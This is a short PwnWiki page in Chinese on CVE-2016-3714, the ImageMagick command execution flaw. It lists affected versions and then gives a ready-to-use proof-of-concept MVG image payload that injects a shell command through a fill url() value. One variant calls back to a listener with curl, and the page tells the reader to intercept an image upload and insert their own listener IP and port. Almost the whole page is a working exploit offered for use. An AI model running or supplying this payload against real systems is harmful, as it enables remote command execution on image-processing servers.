CVE-2016-3714 ImageMagick 命令執行漏洞

From PwnWiki
Revision as of 14:15, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> mageMagick 6.5.7-8 ImageMagick 6.7.7-10 <6.9.3-9 released ==POC== <pre> push graphic-context viewbox 0 0 640 4...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

漏洞影響

mageMagick 6.5.7-8


ImageMagick 6.7.7-10


<6.9.3-9 released


POC

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| command")'
pop graphic-context

圖片上傳點,抓包 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

修改IP和端口爲監聽機器的IP和端口。

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2016-3714_ImageMagick_命令執行漏洞&oldid=6622"